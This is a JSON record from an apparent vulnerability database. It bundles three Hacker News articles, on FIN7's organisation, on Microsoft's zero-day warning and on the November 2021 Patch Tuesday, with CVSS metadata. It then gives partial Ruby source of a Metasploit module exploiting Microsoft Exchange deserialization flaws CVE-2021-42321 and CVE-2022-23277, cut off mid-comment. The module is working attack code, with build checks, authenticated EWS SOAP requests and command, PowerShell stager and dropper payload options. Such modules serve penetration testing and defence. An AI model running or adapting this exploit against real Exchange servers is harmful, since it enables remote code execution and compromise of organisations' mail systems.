Syndicate](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhQwT6VXETxCd7gYcc7Yd03MnZ7nA_L948mXUJkAgn4SOwbIKEi30eZGf2YXgDN1QA6ak7etSe1368r_b5rgcDyV09jIQcKz5GDMmpp_UKs4886x6Kuq9llZuCFuz8reUq22aBAZ38FrxOOFeTSJLmECsaMukFx9rTLqxuCz3Zl5ijc2Cr1ucglgif1/s728-rj-e365/map.png>)\n\nThese infection sequences are also designed to load remote access trojans such as [Carbanak](<https://thehackernews.com/2021/06/fin7-supervisor-gets-7-year-jail-term.html>), [Lizar](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>) (aka Tirion), and [IceBot](<https://www.recordedfuture.com/fin7-flash-drives-spread-remote-access-trojan>), the latter of which was first documented by Recorded Future-owned Gemini Advisory in January 2022.\n\nOther tools developed and delivered by FIN7 encompass a module dubbed Checkmarks that's orchestrated to automate mass scans for vulnerable Microsoft Exchange servers and other public-facing web applications as well as [Cobalt Strike](<https://thehackernews.com/2022/11/google-identifies-34-cracked-versions.html>) for post-exploitation.\n\nIn yet another indication that criminal groups [function like traditional companies](<https://thehackernews.com/2022/04/researchers-share-in-depth-analysis-of.html>), FIN7 follows a team structure consisting of top-level management, developers, pentesters, affiliates, and marketing teams, each of whom are tasked with individual responsibilities.\n\nWhile two members named Alex and Rash are the chief players behind the operation, a third managerial member named Sergey-Oleg is responsible for delegating duties to the group's other associates and overseeing their execution.\n\nHowever, an examination of the group's Jabber conversation history has revealed that operators in administrator positions engage in coercion and blackmail to intimidate team members into working more and issue ultimatums to \"hurt their family members in case of resigning or escaping from responsibilities.\"\n\nThe findings come more than a month after cybersecurity company SentinelOne [identified](<https://thehackernews.com/2022/11/researchers-find-links-bw-black-basta.html>) potential links between FIN7 and the Black Basta ransomware operation.\n\n\"FIN7 has established itself as an extraordinarily versatile and well-known APT group that targets enterprise companies,\" PRODAFT concluded. \"Their signature move is to thoroughly research the companies based on their revenue, employee count, headquarters and website information to pinpoint the most profitable targets.\"\n\n\"Although they have internal issues related to the unequal distribution of obtained monetary resources and somewhat questionable practices towards their members, they have managed to establish a strong presence in the cybercrime sphere.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T13:13:00", "type": "thn", "title": "FIN7 Cybercrime Syndicate Emerges as a Major Player in Ransomware Landscape", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2021-42321"], "modified": "2022-12-26T11:59:04", "id": "THN:CE51F3F4A94EFC268FD06200BF55BECD", "href": "https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-12-14T04:09:19", "description": "[![0-Day Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjTxKfxj2a6lMbDbJaMo5tht_LOymmcrKcCWFtR24mQo74TUahCanF09uTukayi4zQWtyXbBN6gL1r8Q_F8hPVGvbFPUvpNfu0RMdh_in3x47i7NaY_2APPaDC8WmxtnyovksaoophnnKee-_hL8d3KTmywDQksxEixb5Qu7Hqf3_NL3lzttzW4eVJp/s728-e100/ms.jpg>)\n\nMicrosoft is warning of an uptick among nation-state and criminal actors increasingly leveraging publicly-disclosed zero-day vulnerabilities for breaching target environments.\n\nThe tech giant, in its 114-page [Digital Defense Report](<https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report-2022>), said it has \"observed a reduction in the time between the announcement of a vulnerability and the commoditization of that vulnerability,\" making it imperative that organizations patch such exploits in a timely manner.\n\nThis also corroborates with an April 2022 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which [found](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that bad actors are \"aggressively\" targeting newly disclosed software bugs against broad targets globally.\n\nMicrosoft noted that it only takes 14 days on average for an exploit to be available in the wild after public disclosure of a flaw, stating that while zero-day attacks are initially limited in scope, they tend to be swiftly adopted by other threat actors, leading to indiscriminate probing events before the patches are installed.\n\nIt further accused Chinese state-sponsored groups of being \"particularly proficient\" at discovering and developing zero-day exploits.\n\n[![0-Day Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj2Fv84B8E1NDduixEzAgNyU-RvvdpVt2eY23UON-dCns8KnaaAn-rqjv_Tihoscf0lzJzcswmhacAZgW8Jdh82sqVfWIDHVa5zBDWPlh_uT7dLVU8BmoLqbWxqL-deV3Ok2yZ8h76dqXIbZ3SIOJJND7p6ixLGZmV_q9RpnvhYkQ9ABNMKZOdjtetP/s728-e100/exploit.jpg>)\n\nThis has been compounded by the fact that the Cyberspace Administration of China (CAC) enacted a new [vulnerability reporting regulation](<https://thehackernews.com/2021/07/chinas-new-law-requires-researchers-to.html>) in September 2021 that requires security flaws to be reported to the government prior to them being shared with the product developers.\n\nRedmond further said the law could enable government-backed elements to stockpile and weaponize the reported bugs, resulting in the increased use of zero-days for espionage activities designed to advance China's economic and military interests.\n\n[![state-sponsored hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjzThAws7Nwe2onkDTrV1eAUZuHoxUQmHQD89fb1AMyF95hzxM_bjDK2t9-CUBtPHmaWAaGh6oLRZRmlWELsneZ9fLS1yThyXWXTF3Vhb67iMNcw8AvGM2hLy535BKjYA6NJ8csrauUfJWp6VGl-g4LRpHIAsWQ1E7ev0MDFndlR4i_R0-xqgivOOTY/s728-e100/map.jpg>)\n\nSome of the vulnerabilities that were first exploited by Chinese actors before being picked up by other adversarial groups include -\n\n * [**CVE-2021-35211**](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>) (CVSS score: 10.0) - A remote code execution flaw in SolarWinds Serv-U Managed File Transfer Server and Serv-U Secure FTP software that was exploited by DEV-0322.\n * [**CVE-2021-40539**](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) (CVSS score: 9.8) - An authentication bypass flaw in Zoho ManageEngine ADSelfService Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-44077**](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) - An unauthenticated remote code execution flaw in Zoho ManageEngine ServiceDesk Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-42321**](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) (CVSS score: 8.8) - A remote code execution flaw in Microsoft Exchange Server that was exploited three days after it was revealed during the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) hacking contest on October 16-17, 2021.\n * [**CVE-2022-26134**](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) (CVSS score: 9.8) - An Object-Graph Navigation Language (OGNL) injection flaw in Atlassian Confluence that's likely to have been leveraged by a China-affiliated actor against an unnamed U.S. entity days before the flaw's disclosure on June 2.\n\nThe findings also come almost a month after CISA released a list of [top vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-279a>) weaponized by China-based actors since 2020 to steal intellectual property and develop access into sensitive networks.\n\n\"Zero-day vulnerabilities are a particularly effective means for initial exploitation and, once publicly exposed, vulnerabilities can be rapidly reused by other nation-state and criminal actors,\" the company said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-05T06:00:00", "type": "thn", "title": "Microsoft Warns of Uptick in Hackers Leveraging Publicly-Disclosed 0-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539", "CVE-2021-42321", "CVE-2021-44077", "CVE-2022-26134"], "modified": "2022-12-14T04:04:34", "id": "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "href": "https://thehackernews.com/2022/11/microsoft-warns-of-uptick-in-hackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:08", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEhrn2bWy7kjDMwA-e1FgvQFFMgrMtX-KgrErvJPqeWzafsVSb1_k78GC6nholdd_d2DbzcYuqf98udpn_wTk-_6KFu5RQPIErnTKIVlDcjYP53gT98kJt8q8r27D7qssyXxYP4p6fp_cLi19zCXc74h2z5whc0gh3HlD5MkZY7amV1fGnZgsthUv_op)](<https://thehackernews.com/new-images/img/a/AVvXsEhrn2bWy7kjDMwA-e1FgvQFFMgrMtX-KgrErvJPqeWzafsVSb1_k78GC6nholdd_d2DbzcYuqf98udpn_wTk-_6KFu5RQPIErnTKIVlDcjYP53gT98kJt8q8r27D7qssyXxYP4p6fp_cLi19zCXc74h2z5whc0gh3HlD5MkZY7amV1fGnZgsthUv_op>)\n\nMicrosoft has released security updates as part of its monthly [Patch Tuesday](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Nov>) release cycle to address 55 vulnerabilities across Windows, Azure, Visual Studio, Windows Hyper-V, and Office, including fixes for two actively exploited zero-day flaws in Excel and Exchange Server that could be abused to take control of an affected system.\n\nOf the 55 glitches, six are rated Critical and 49 are rated as Important in severity, with four others listed as publicly known at the time of release. \n\nThe most critical of the flaws are [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321>) (CVSS score: 8.8) and [CVE-2021-42292](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42292>) (CVSS score: 7.8), each concerning a [post-authentication remote code execution flaw](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169>) in Microsoft Exchange Server and a security bypass vulnerability impacting Microsoft Excel versions 2013-2021 respectively.\n\nThe Exchange Server issue is also one of the bugs that was demonstrated at the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) held in China last month. However, the Redmond-based tech giant did not provide any details on how the two aforementioned vulnerabilities were used in real-world attacks.\n\n\"Earlier this year, Microsoft alerted that APT Group HAFNIUM was exploiting [four zero-day vulnerabilities](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) in the Microsoft Exchange server,\" said Bharat Jogi, director of vulnerability and threat research at Qualys.\n\n\"This evolved into exploits of Exchange server vulnerabilities by DearCry Ransomware \u2014 including attacks on infectious disease researchers, law firms, universities, defense contractors, policy think tanks and NGOs. Instances such as these further underscore that Microsoft Exchange servers are high-value targets for hackers looking to penetrate critical networks,\" Jogi added.\n\nAlso addressed are four publicly disclosed, but not exploited, vulnerabilities \u2014\n\n * [**CVE-2021-43208**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43208>) (CVSS score: 7.8) - 3D Viewer Remote Code Execution Vulnerability\n * [**CVE-2021-43209**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43209>) (CVSS score: 7.8) - 3D Viewer Remote Code Execution Vulnerability\n * [**CVE-2021-38631**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38631>) (CVSS score: 4.4) - Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability\n * [**CVE-2021-41371**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41371>) (CVSS score: 4.4) - Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability\n\nMicrosoft's November patch also comes with a resolution for [CVE-2021-3711](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-3711>), a critical buffer overflow flaw in [OpenSSL's SM2 decryption function](<https://thehackernews.com/2021/09/qnap-working-on-patches-for-openssl.html>) that came to light in late August 2021 and could be abused by adversaries to run arbitrary code and cause a denial-of-service (DoS) condition.\n\nOther important remediations include fixes for multiple remote code execution flaws in Chakra Scripting Engine ([CVE-2021-42279](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42279>)), Microsoft Defender ([CVE-2021-42298](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42298>)), Microsoft Virtual Machine Bus ([CVE-2021-26443](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26443>)), Remote Desktop Client ([CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>)), and on-premises versions of Microsoft Dynamics 365 ([CVE-2021-42316](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42316>)).\n\nLastly, the update is rounded by patches for a number of privilege escalation vulnerabilities affecting NTFS ([CVE-2021-41367](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41367>), [CVE-2021-41370](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41370>), [CVE-2021-42283](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42283>)), Windows Kernel ([CVE-2021-42285](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42285>)), Visual Studio Code ([CVE-2021-42322](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42322>)), Windows Desktop Bridge ([CVE-2021-36957](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36957>)), and Windows Fast FAT File System Driver ([CVE-2021-41377](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41377>))\n\nTo [install](<https://support.microsoft.com/en-us/windows/get-the-latest-windows-update-7d20e88c-0568-483a-37bc-c3885390d212#WindowsVersion=Windows_11>) the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nIn addition to Microsoft, security updates have also been released by a number of other vendors to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://thehackernews.com/2021/11/google-warns-of-new-android-0-day.html>)\n * [Cisco](<https://thehackernews.com/2021/11/hardcoded-ssh-key-in-cisco-policy-suite.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-November/thread.html>)\n * [Samba](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/samba-releases-security-updates>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=589496864>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T06:24:00", "type": "thn", "title": "Microsoft Issues Patches for Actively Exploited Excel, Exchange Server 0-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-3711", "CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-42279", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42292", "CVE-2021-42298", "CVE-2021-42316", "CVE-2021-42321", "CVE-2021-42322", "CVE-2021-43208", "CVE-2021-43209"], "modified": "2021-11-10T06:24:06", "id": "THN:554E88E6A1CE9AFD04BF297E68311306", "href": "https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-10-30T22:45:40", "description": "This module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities.\n", "cvss3": {}, "published": "2022-08-09T17:32:09", "type": "metasploit", "title": "Microsoft Exchange Server ChainedSerializationBinder RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42321", "CVE-2022-23277"], "modified": "2022-08-17T21:36:31", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_CHAINEDSERIALIZATIONBINDER_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_chainedserializationbinder_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Exchange\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange Server ChainedSerializationBinder RCE',\n 'Description' => %q{\n This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n Exchange Server 2016 CU22 all prior to Mar22SU.\n\n Note that authentication is required to exploit these vulnerabilities.\n },\n 'Author' => [\n 'pwnforsp', # Original Bug Discovery\n 'zcgonvh', # Of 360 noah lab, Original Bug Discovery\n 'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild\n 'Microsoft Security Response Center', # Discovery of exploitation in the wild\n 'peterjson', # Writeup\n 'testanull', # PoC Exploit\n 'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D\n 'Spencer McIntyre', # CVE-2022-23277 support and DataSet gadget chains\n 'Markus Wulftange' # CVE-2022-23277 research\n ],\n 'References' => [\n # CVE-2021-42321 references\n ['CVE', '2021-42321'],\n ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],\n ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],\n ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],\n ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],\n ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'],\n # CVE-2022-23277 references\n ['CVE', '2022-23277'],\n ['URL', 'https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html'],\n ['URL', 'https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c']\n ],\n 'DisclosureDate' => '2021-12-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'HttpClientTimeout' => 5,\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169\n CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.\n ]\n }\n )\n )\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as']),\n OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def cve_2021_42321_vuln_builds\n # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019\n [\n '15.1.2308.8', '15.1.2308.14', '15.1.2308.15', # Exchange Server 2016 CU21\n '15.1.2375.7', '15.1.2375.12', # Exchange Server 2016 CU22\n '15.2.922.7', '15.2.922.13', '15.2.922.14', # Exchange Server 2019 CU10\n '15.2.986.5', '15.2.986.9' # Exchange Server 2019 CU11\n ]\n end\n\n def cve_2022_23277_vuln_builds\n # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019\n [\n '15.1.2308.20', # Exchange Server 2016 CU21 Nov21SU\n '15.1.2308.21', # Exchange Server 2016 CU21 Jan22SU\n '15.1.2375.17', # Exchange Server 2016 CU22 Nov21SU\n '15.1.2375.18', # Exchange Server 2016 CU22 Jan22SU\n '15.2.922.19', # Exchange Server 2019 CU10 Nov21SU\n '15.2.922.20', # Exchange Server 2019 CU10 Jan22SU\n '15.2.986.14', # Exchange Server 2019 CU11 Nov21SU\n '15.2.986.15' # Exchange Server 2019 CU11 Jan22SU\n ]\n end\n\n def check\n # Note we are only checking official releases here to reduce requests when checking versions with exchange_get_version\n current_build_rex = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)\n if current_build_rex.nil?\n return CheckCode::Unknown(\"Couldn't retrieve the target Exchange Server version!\")\n end\n\n @exchange_build = current_build_rex.to_s\n\n if cve_2021_42321_vuln_builds.include?(@exchange_build)\n CheckCode::Appears(\"Exchange Server #{@exchange_build} is vulnerable to CVE-2021-42321\")\n elsif cve_2022_23277_vuln_builds.include?(@exchange_build)\n CheckCode::Appears(\"Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277\")\n else\n CheckCode::Safe(\"Exchange Server #{@exchange_build} does not appear to be a vulnerable version!\")\n end\n end\n\n def exploit\n if @exchange_build.nil? # make sure the target build is known and if it's not (because the check was skipped), get it\n @exchange_build = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)&.to_s\n if @exchange_build.nil?\n fail_with(Failure::Unknown, 'Failed to identify the target Exchange Server build version.')\n end\n end\n\n if cve_2021_42321_vuln_builds.include?(@exchange_build)\n @gadget_chain = :ClaimsPrincipal\n elsif cve_2022_23277_vuln_builds.include?(@exchange_build)\n @gadget_chain = :DataSetTypeSpoof\n else\n fail_with(Failure::NotVulnerable, \"Exchange Server #{@exchange_build} is not a vulnerable version!\")\n end\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # Get the user's inbox folder's ID and change key ID.\n print_status(\"Getting the user's inbox folder's ID and ChangeKey ID...\")\n xml_getfolder_inbox = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\" />\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_getfolder_inbox,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n if res.code == 401\n fail_with(Failure::NoAccess, \"Server responded with 401 Unauthorized for user: #{datastore['DOMAIN']}\\\\#{username}\")\n end\n\n xml_getfolder = res.get_xml_document\n xml_getfolder.remove_namespaces!\n xml_tag = xml_getfolder.xpath('//FolderId')\n if xml_tag.empty?\n print_error('Are you sure the current user has logged in previously to set up their mailbox? It seems they may have not had a mailbox set up yet!')\n fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')\n end\n unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')\n fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')\n end\n change_key_val = xml_tag.attribute('ChangeKey').value\n folder_id_val = xml_tag.attribute('Id').value\n print_good(\"ChangeKey value for Inbox folder is #{change_key_val}\")\n print_good(\"ID value for Inbox folder is #{folder_id_val}\")\n\n # Delete the user configuration object that currently 